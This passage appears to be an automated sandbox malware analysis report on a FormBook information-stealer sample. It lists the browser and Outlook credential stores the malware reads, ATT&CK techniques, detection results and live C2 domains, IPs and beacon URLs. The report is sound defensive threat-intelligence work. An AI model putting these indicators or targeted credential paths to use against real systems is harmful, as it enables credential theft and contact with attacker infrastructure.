            Source: Yara matchFile source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467082 Sample: CMV610942X6UI.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 31 www.tapnly.online 2->31 33 www.marinestoreng.com 2->33 35 8 other IPs or domains 2->35 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 6 other signatures 2->51 10 CMV610942X6UI.exe 3 2->10         started        signatures3 process4 file5 29 C:\Users\user\...\CMV610942X6UI.exe.log, ASCII 10->29 dropped 63 Injects a PE file into a foreign processes 10->63 14 CMV610942X6UI.exe 10->14         started        signatures6 process7 signatures8 65 Maps a DLL or memory area into another process 14->65 17 ZkqZZBQxQqm.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 systray.exe 13 17->20         started        process11 signatures12 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Modifies the context of a thread in another process (thread injection) 20->57 59 3 other signatures 20->59 23 ZkqZZBQxQqm.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.zethcraft.info 203.161.62.199, 49723, 49724, 49725 VNPT-AS-VNVNPTCorpVN Malaysia 23->37 39 www.kwytruband.cloud 124.156.180.97, 49743, 49744, 49745 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN Singapore 23->39 41 6 other IPs or domains 23->41 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            CMV610942X6UI.exe32%ReversingLabsByteCode-MSIL.Trojan.Swotter
            CMV610942X6UI.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.aotuqiye.com/kyls/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.kwytruband.cloud/siy1/?Efup=K3jVd2QwvP/vE5bLqRwLiG/ouCi2dCf8HcrsXZX+iIcvtfjJNCMaZ4cNZ/78hy4DUFhEXV0DZOcTULe6zQ1rJbzjmaVovzYps5hxNWqkCnG6IikFfqhaq5tMJN6I5yDLJQ==&5X=Wrl4wnYP0%Avira URL Cloudsafe
            http://www.kwytruband.cloud0%Avira URL Cloudsafe
            http://www.marinestoreng.com/w7zx/0%Avira URL Cloudsafe
            https://www.herplaatsingscoach.com/wwqg/?Efup=cPWBLmqfYdwFLm3BEseWSNTw863lhs9YSZmOJUbUOjzc/4eC4u1GiX0%Avira URL Cloudsafe
            http://www.tutoringservices-jp.space/7kq8/100%Avira URL Cloudphishing
            http://www.kwytruband.cloud/siy1/0%Avira URL Cloudsafe
            http://www.zethcraft.info/d5d3/?Efup=XQbeRjD/PDdWBh12NU+ykUl2F4dvHc6VXEhqzGSjB3wJSjcs0xwI8Icac1G5+8QpiM7OSYRY7+DwwJfqawKXGWKHnDunR+LM5fl2Yw480JpoJUWygYqvECbW/AkZxLcv1w==&5X=Wrl4wnYP0%Avira URL Cloudsafe
            http://www.thirstythursdaywines.com/bakr/?Efup=XDoTgsrtu8W4rBGfVFPBe+VTMhp4aj1fDDoEglHaJ5OOwDCoRETt6EMOwV71ZOd09KZu8+ugWGfmhcxQhERPkTRicN45Uigraquu8zuJ3nqxw5c62M4XByCrclFahX0wxg==&5X=Wrl4wnYP0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.aotuqiye.com/kyls/?Efup=rBqEkS5/F5fti2d01GsRL+09s9Yw9GfL+xb/bd6jjd9iqmgZJUglXlxIaQ37OHsjGQRRYNPuqH7W49E+lFfrzONNxRCWpYpdl2nohzXrMm+ut6S054Q8wZKBKIXyn1qR4w==&5X=Wrl4wnYP0%Avira URL Cloudsafe
            http://www.herplaatsingscoach.com/wwqg/0%Avira URL Cloudsafe
            http://www.zethcraft.info/d5d3/0%Avira URL Cloudsafe
            https://www.sedo.com/services/parking.php30%Avira URL Cloudsafe
            http://www.marinestoreng.com/w7zx/?Efup=4nFzxviigBNCR0XnJkvhNhUb0o3qDKAKJVt5c0EBpnWfgFZ7hCzAhg6W/oCSYblqABe344EIzDMItVaOjGR7QKZXmGlK5CURSd3zTznCfgDClaltbyP35QucHh8Re5qnMA==&5X=Wrl4wnYP0%Avira URL Cloudsafe
            http://www.herplaatsingscoach.com/wwqg/?Efup=cPWBLmqfYdwFLm3BEseWSNTw863lhs9YSZmOJUbUOjzc/4eC4u1GiXOWq2hFnbSrpYq5tfQM8qwnGlhpBH7wUMA2rqYfQo8R+3WIcA6o0TPRBDA7dTlRc+xV9X/9AN+Ulg==&5X=Wrl4wnYP0%Avira URL Cloudsafe
            http://www.mommysdaycare.net/9tym/?Efup=0S/ZPq6i4295YU31CGsIF3+6CX49wr8UBlIPMbX3EHvT6GYfIlkKvIaQUZZ23gNfBRY92LbOf61zdN1D+KaxZKPZCNQTzZg2JqvKwBvhTNR6FU45NnpKZwAnu57SnFRcaQ==&5X=Wrl4wnYP0%Avira URL Cloudsafe
            http://www.tutoringservices-jp.space/7kq8/?Efup=gtM5/A+y2ZoJWEDfDaE+2w6kJ8M6pgUfoEVlPe5CjlMa7apflPEeb4hE3FwUuugxFTbEVrAuO+b6prDKuBbSe95OhQpk0L9IAVb1ZHk0JEw5+OIIQunEo+vX5ya5UUiI4w==&5X=Wrl4wnYP100%Avira URL Cloudphishing
            http://www.mommysdaycare.net/9tym/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.mommysdaycare.net
            		199.59.243.226
            		truefalse
              		unknown
              marinestoreng.com
              		131.153.148.82
              		truefalse
                		unknown
                www.tutoringservices-jp.space
                		64.190.62.22
                		truefalse
                  		unknown
                  www.kwytruband.cloud
                  		124.156.180.97
                  		truefalse
                    		unknown
                    www.thirstythursdaywines.com
                    		38.207.228.45
                    		truefalse
                      		unknown
                      www.zethcraft.info
                      		203.161.62.199
                      		truefalse
                        		unknown
                        www.aotuqiye.com
                        		104.21.10.169
                        		truefalse
                          		unknown
                          www.herplaatsingscoach.com
                          		35.214.213.30
                          		truefalse
                            		unknown
                            www.tapnly.online
                            		unknown
                            		unknowntrue
                              		unknown
                              www.marinestoreng.com
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.kwytruband.cloud/siy1/?Efup=K3jVd2QwvP/vE5bLqRwLiG/ouCi2dCf8HcrsXZX+iIcvtfjJNCMaZ4cNZ/78hy4DUFhEXV0DZOcTULe6zQ1rJbzjmaVovzYps5hxNWqkCnG6IikFfqhaq5tMJN6I5yDLJQ==&5X=Wrl4wnYPfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.aotuqiye.com/kyls/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.marinestoreng.com/w7zx/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.kwytruband.cloud/siy1/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.tutoringservices-jp.space/7kq8/false
                                • Avira URL Cloud: phishing
                                		unknown
                                http://www.zethcraft.info/d5d3/?Efup=XQbeRjD/PDdWBh12NU+ykUl2F4dvHc6VXEhqzGSjB3wJSjcs0xwI8Icac1G5+8QpiM7OSYRY7+DwwJfqawKXGWKHnDunR+LM5fl2Yw480JpoJUWygYqvECbW/AkZxLcv1w==&5X=Wrl4wnYPfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.thirstythursdaywines.com/bakr/?Efup=XDoTgsrtu8W4rBGfVFPBe+VTMhp4aj1fDDoEglHaJ5OOwDCoRETt6EMOwV71ZOd09KZu8+ugWGfmhcxQhERPkTRicN45Uigraquu8zuJ3nqxw5c62M4XByCrclFahX0wxg==&5X=Wrl4wnYPfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.aotuqiye.com/kyls/?Efup=rBqEkS5/F5fti2d01GsRL+09s9Yw9GfL+xb/bd6jjd9iqmgZJUglXlxIaQ37OHsjGQRRYNPuqH7W49E+lFfrzONNxRCWpYpdl2nohzXrMm+ut6S054Q8wZKBKIXyn1qR4w==&5X=Wrl4wnYPfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.zethcraft.info/d5d3/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.mommysdaycare.net/9tym/?Efup=0S/ZPq6i4295YU31CGsIF3+6CX49wr8UBlIPMbX3EHvT6GYfIlkKvIaQUZZ23gNfBRY92LbOf61zdN1D+KaxZKPZCNQTzZg2JqvKwBvhTNR6FU45NnpKZwAnu57SnFRcaQ==&5X=Wrl4wnYPfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.marinestoreng.com/w7zx/?Efup=4nFzxviigBNCR0XnJkvhNhUb0o3qDKAKJVt5c0EBpnWfgFZ7hCzAhg6W/oCSYblqABe344EIzDMItVaOjGR7QKZXmGlK5CURSd3zTznCfgDClaltbyP35QucHh8Re5qnMA==&5X=Wrl4wnYPfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.herplaatsingscoach.com/wwqg/?Efup=cPWBLmqfYdwFLm3BEseWSNTw863lhs9YSZmOJUbUOjzc/4eC4u1GiXOWq2hFnbSrpYq5tfQM8qwnGlhpBH7wUMA2rqYfQo8R+3WIcA6o0TPRBDA7dTlRc+xV9X/9AN+Ulg==&5X=Wrl4wnYPfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.herplaatsingscoach.com/wwqg/false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.tutoringservices-jp.space/7kq8/?Efup=gtM5/A+y2ZoJWEDfDaE+2w6kJ8M6pgUfoEVlPe5CjlMa7apflPEeb4hE3FwUuugxFTbEVrAuO+b6prDKuBbSe95OhQpk0L9IAVb1ZHk0JEw5+OIIQunEo+vX5ya5UUiI4w==&5X=Wrl4wnYPfalse
                                • Avira URL Cloud: phishing
                                		unknown
                                http://www.mommysdaycare.net/9tym/false
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabsystray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.kwytruband.cloudZkqZZBQxQqm.exe, 00000009.00000002.3264294523.000000000562C000.00000040.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.herplaatsingscoach.com/wwqg/?Efup=cPWBLmqfYdwFLm3BEseWSNTw863lhs9YSZmOJUbUOjzc/4eC4u1GiXsystray.exe, 00000008.00000002.3263725709.000000000622C000.00000004.10000000.00040000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000002.3262249137.0000000003BBC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.ecosia.org/newtab/systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.sedo.com/services/parking.php3systray.exe, 00000008.00000002.3263725709.00000000066E2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.3265428680.0000000007FC0000.00000004.00000800.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000002.3262249137.0000000004072000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ac.ecosia.org/autocomplete?q=systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.comsystray.exe, 00000008.00000002.3263725709.0000000006874000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.3265428680.0000000007FC0000.00000004.00000800.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000009.00000002.3262249137.0000000004204000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsystray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=systray.exe, 00000008.00000002.3265549570.0000000008308000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                38.207.228.45
                                		www.thirstythursdaywines.comUnited States
                                		9009M247GBfalse
                                124.156.180.97
                                		www.kwytruband.cloudSingapore
                                		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                199.59.243.226
                                		www.mommysdaycare.netUnited States
                                		395082BODIS-NJUSfalse
                                203.161.62.199
                                		www.zethcraft.infoMalaysia
                                		45899VNPT-AS-VNVNPTCorpVNfalse
                                64.190.62.22
                                		www.tutoringservices-jp.spaceUnited States
                                		11696NBS11696USfalse
                                104.21.10.169
                                		www.aotuqiye.comUnited States
                                		13335CLOUDFLARENETUSfalse
                                131.153.148.82
                                		marinestoreng.comUnited States
                                		19437SS-ASHUSfalse
                                35.214.213.30
                                		www.herplaatsingscoach.comUnited States
                                		19527GOOGLE-2USfalse

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1467082
                                Start date and time:2024-07-03 18:01:28 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 52s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Run name:Run with higher sleep bypass
                                Number of analysed new started processes analysed:12
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:2
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:CMV610942X6UI.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@7/2@9/8
                                EGA Information:
                                • Successful, ratio: 75%
                                HCA Information:
                                • Successful, ratio: 91%
                                • Number of executed functions: 97
                                • Number of non-executed functions: 249
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: CMV610942X6UI.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                12:03:36API Interceptor6212595x Sleep call for process: systray.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                124.156.180.97DHL Consigment_pdf.exeGet hashmaliciousFormBookBrowse
                                • www.kwytruband.cloud/lilf/
                                DHL Overdue Account Notice-1301645540.exeGet hashmaliciousFormBookBrowse
                                • www.kwytruband.cloud/lilf/
                                199.59.243.226AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                • www.orthonow.live/c7lp/
                                hOe2JrpIAE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • www.shopusuniform.com/cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb
                                factura.exeGet hashmaliciousFormBookBrowse
                                • www.4cityclean.uno/qpcj/
                                RSW6103D401005.exeGet hashmaliciousFormBookBrowse
                                • www.42bomclub.com/zq0e/
                                82xul16VKj.exeGet hashmaliciousCryptOne, VidarBrowse
                                • survey-smiles.com/
                                rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                                • www.mommysdaycare.net/k4dg/
                                1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                • www.42bomclub.com/zq0e/
                                AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                • www.window-replace5.top/dihh/
                                eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
                                • www.home-repair-contractors-kfm.xyz/btrd/?OR-TJfQ=eVMlJIJ+geaZUobAArdtG7xbZNorDbW6x7q4JZ9YU9WFmkuuB+jImMamgZk5Kk8mIb1RaQ==&2dc=kvXd-rKHCF
                                mEESdHRhbB.exeGet hashmaliciousFormBookBrowse
                                • www.42bomclub.com/zq0e/
                                203.161.62.199rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                                • www.quantumvoil.xyz/gb2c/
                                1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                • www.zethcraft.info/d5d3/
                                Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                                • www.quantumvoil.xyz/gb2c/
                                DHL Consigment_pdf.exeGet hashmaliciousFormBookBrowse
                                • www.quantumvoil.xyz/d5uo/
                                DHL Overdue Account Notice-1301645540.exeGet hashmaliciousFormBookBrowse
                                • www.quantumvoil.xyz/d5uo/
                                Transfer Swift USD 87000.exeGet hashmaliciousFormBookBrowse
                                • www.zethcraft.info/vihs/
                                unexpressiveness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • www.deckput.top/s5i3/
                                PO S-TECHAccolle654657659768774876980.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                • www.lunarharbor.info/4usr/
                                Ballahoo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • www.deckput.top/s5i3/
                                BE.exeGet hashmaliciousFormBookBrowse
                                • www.gudvain.top/nrup/

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                www.herplaatsingscoach.comSecuriteInfo.com.Trojan.PackedNET.2617.19984.3469.exeGet hashmaliciousFormBookBrowse
                                • 35.214.213.30
                                SecuriteInfo.com.Trojan.PackedNET.2617.23814.24692.exeGet hashmaliciousFormBookBrowse
                                • 35.214.213.30
                                REVISED_SOA_USD44,000.exeGet hashmaliciousFormBookBrowse
                                • 35.214.213.30
                                CTM_REQUEST_USD12,400.exeGet hashmaliciousFormBookBrowse
                                • 35.214.213.30
                                PAYMENT_DETAILS_#665QRT7788-987626-QQQQMKPZXX.exeGet hashmaliciousFormBook, zgRATBrowse
                                • 35.214.213.30
                                SWIFT-PYT.exeGet hashmaliciousFormBook, zgRATBrowse
                                • 35.214.213.30
                                Dev-Quotation_Request_Q7688T.exeGet hashmaliciousFormBookBrowse
                                • 35.214.213.30
                                www.thirstythursdaywines.comq0qyDEouNv.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                • 23.235.171.113
                                www.mommysdaycare.netrPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.226
                                Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.226
                                MOfdzIVSmy.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 199.59.243.225
                                SecuriteInfo.com.Win32.PWSX-gen.8428.27403.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                OD.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                www.tutoringservices-jp.spaceSWIFT_COPY_USD20,000.exeGet hashmaliciousFormBookBrowse
                                • 64.190.62.22
                                www.kwytruband.cloudDHL Consigment_pdf.exeGet hashmaliciousFormBookBrowse
                                • 124.156.180.97
                                DHL Overdue Account Notice-1301645540.exeGet hashmaliciousFormBookBrowse
                                • 124.156.180.97
                                BANK_MT103_PAYMENT.docGet hashmaliciousFormBookBrowse
                                • 124.156.180.97
                                www.zethcraft.info1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                • 203.161.62.199
                                mEESdHRhbB.exeGet hashmaliciousFormBookBrowse
                                • 203.161.62.199
                                Transfer Swift USD 87000.exeGet hashmaliciousFormBookBrowse
                                • 203.161.62.199
                                ORIGINAL SHIPPING DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                                • 203.161.62.199
                                Saudi_Aramco__TenderRFQ.exeGet hashmaliciousFormBookBrowse
                                • 203.161.62.199
                                SecuriteInfo.com.NSIS.Injector.SPOW.tr.7679.1853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 203.161.62.199
                                SecuriteInfo.com.Trojan.GenericKD.70689352.25194.12145.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 203.161.62.199

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                NBS11696USArt_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
                                • 64.190.62.22
                                spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                • 64.190.62.22
                                Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                                • 64.190.63.222
                                gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                                • 64.190.63.222
                                Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                                • 64.190.63.222
                                gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                                • 64.190.63.222
